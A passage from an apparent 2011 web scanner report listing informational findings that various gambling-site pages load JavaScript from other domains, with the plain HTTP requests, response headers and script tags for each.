Request

GET /Home.aspx HTTP/1.1
Host: no.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.34. http://no.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://no.winnings.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

GET / HTTP/1.1
Host: no.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.35. http://okscratchcards.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://okscratchcards.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET / HTTP/1.1
Host: okscratchcards.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Date: Mon, 16 May 2011 11:37:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.okscratchcards.com/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12080

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Con
...[SNIP]...
</script>
<script src="http://s0.2mdn.net/879366/flashwrite_1_2.js" type="text/javascript"></script>
...[SNIP]...

19.36. http://poker.bet365.com/home/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://poker.bet365.com
Path:	/home/en/

Issue detail

The response dynamically includes the following script from another domain:

http://banner.bet365casino.com/fimversion.conf.php

Request

GET /home/en/ HTTP/1.1
Host: poker.bet365.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.37. https://poker.betsson.com/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://poker.betsson.com
Path:	/en/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js

Request

GET /en/ HTTP/1.1
Host: poker.betsson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=d2twxznhgovrix45ynqrh1a1; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=d2twxznhgovrix45ynqrh1a1; path=/; HttpOnly
Set-Cookie: lggdnstt=0; path=/
X-Powered-By: ASP.NET
Date: Mon, 16 May 2011 12:13:27 GMT
Connection: close
Content-Length: 39393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head">

...[SNIP]...
</script>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js"></script>
...[SNIP]...
</ul>

<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js"></script>
...[SNIP]...

19.38. http://pt.bigmoneyscratch.com/Home.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pt.bigmoneyscratch.com
Path:	/Home.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://ad.yieldmanager.com/pixel?id=706968&t=1

Request

GET /Home.aspx HTTP/1.1
Host: pt.bigmoneyscratch.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:32:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=pahz1f55bifuak454oua1545; path=/; HttpOnly
Set-Cookie: LanguageCode=POR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSI_12=EncryptedUniqueVisitorID=D3E2C7C0FC1C66FB51594A8A6E84CF00&AffiliateID=12&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; domain=bigmoneyscratch.com; expires=Fri, 16-May-2031 12:32:29 GMT; path=/
Set-Cookie: RegistrationMode=PM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: BO=FM; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: UniqueVisitorID=D3E2C7C0FC1C66FB51594A8A6E84CF00; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: LanguageCode=POR; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=bigmoneyscratch.com; expires=Fri, 16-May-2014 12:32:29 GMT; path=/
Set-Cookie: CSITemp=12; domain=bigmoneyscratch.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 48503

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
<div id="ctl00_pnlUniqueVisit_12">

<script src="http://ad.yieldmanager.com/pixel?id=706968&t=1" type="text/javascript"></script>
...[SNIP]...

19.39. http://pt.winnings.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pt.winnings.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://www.cdnfo.com/scripts/js.js
http://www.cdnfo.com/scripts/swfobject1-5.js

Request

GET / HTTP/1.1
Host: pt.winnings.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

19.40. http://ronaldheft.com/code/analyticator/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ronaldheft.com
Path:	/code/analyticator/

Issue detail

The response dynamically includes the following scripts from other domains:

http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/ronaldheft.json?callback=twitterCallback2&count=1

Request

GET /code/analyticator/ HTTP/1.1
Host: ronaldheft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 12:23:52 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=300, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18318

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn
...[SNIP]...


<script type="text/javascript" src="http://twitter.com/javascripts/blogger.js"></script>
<script type="text/javascript" src="http://twitter.com/statuses/user_timeline/ronaldheft.json?callback=twitterCallback2&count=1"></script>
...[SNIP]...

19.41. https://scratch.betsson.com/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.42. https://scratch.betsson.com/en/Casino previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.43. https://scratch.betsson.com/en/Casino/Bingo-Bonanza previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Bingo-Bonanza

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.44. https://scratch.betsson.com/en/Casino/Bubble-Bingo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Bubble-Bingo

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.45. https://scratch.betsson.com/en/Casino/Disco-Keno previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Disco-Keno

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.46. https://scratch.betsson.com/en/Casino/HiLo previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/HiLo

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.47. https://scratch.betsson.com/en/Casino/Lucky-21 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Lucky-21

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.48. https://scratch.betsson.com/en/Casino/Namaste previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Namaste

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.49. https://scratch.betsson.com/en/Casino/Poker-King previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Poker-King

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.50. https://scratch.betsson.com/en/Casino/Roulette previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Roulette

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.51. https://scratch.betsson.com/en/Casino/Royal-Slots previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Royal-Slots

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.52. https://scratch.betsson.com/en/Casino/Slot-Super-7 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Casino/Slot-Super-7

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.53. https://scratch.betsson.com/en/Classic previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.54. https://scratch.betsson.com/en/Classic/3-Wow previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/3-Wow

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.55. https://scratch.betsson.com/en/Classic/7th-Heaven previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/7th-Heaven

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.56. https://scratch.betsson.com/en/Classic/Champagne previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Champagne

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.57. https://scratch.betsson.com/en/Classic/Golden-Fortune previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Golden-Fortune

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.58. https://scratch.betsson.com/en/Classic/Happy-Birthday previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Happy-Birthday

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.59. https://scratch.betsson.com/en/Classic/Jungle-Joy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Jungle-Joy

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.60. https://scratch.betsson.com/en/Classic/Neighbors previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Neighbors

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.61. https://scratch.betsson.com/en/Classic/Spy-Comics previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Spy-Comics

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.62. https://scratch.betsson.com/en/Classic/Super-3-Wow previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Super-3-Wow

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.63. https://scratch.betsson.com/en/Classic/Tiger-Mahjong previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Tiger-Mahjong

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.64. https://scratch.betsson.com/en/Classic/Wild-West previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/Wild-West

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.65. https://scratch.betsson.com/en/Classic/XO previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Classic/XO

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.66. https://scratch.betsson.com/en/Default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Default.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.67. https://scratch.betsson.com/en/FAQ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/FAQ

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.68. https://scratch.betsson.com/en/Fantasy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.69. https://scratch.betsson.com/en/Fantasy/Cash-Farm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Cash-Farm

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.70. https://scratch.betsson.com/en/Fantasy/Club-Pearl previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Club-Pearl

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.71. https://scratch.betsson.com/en/Fantasy/Crazy-Cat previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Crazy-Cat

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.72. https://scratch.betsson.com/en/Fantasy/Dancing-Domino previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Dancing-Domino

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.73. https://scratch.betsson.com/en/Fantasy/Fast-Hands previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Fast-Hands

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.74. https://scratch.betsson.com/en/Fantasy/Golden-Island previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Golden-Island

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.75. https://scratch.betsson.com/en/Fantasy/Knights-Battle previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Knights-Battle

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.76. https://scratch.betsson.com/en/Fantasy/Love-Birds previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Love-Birds

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.77. https://scratch.betsson.com/en/Fantasy/Lucky-Diamonds previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
Path:	/en/Fantasy/Lucky-Diamonds

Issue detail

The response dynamically includes the following scripts from other domains:

https://ble.hs.llnwd.net/e1/betsson/en/df_CoreFontLibrary_en_v27087.Js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJavaScriptV2_v102197.js
https://ble.hs.llnwd.net/e1/betsson/en/df_CoreJsRoot_v105046.js
https://ble.hs.llnwd.net/e1/scratch/en/df_ScratchMasterJS.js

Request

Response

19.78. https://scratch.betsson.com/en/Fantasy/Master-Mix previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://scratch.betsson.com
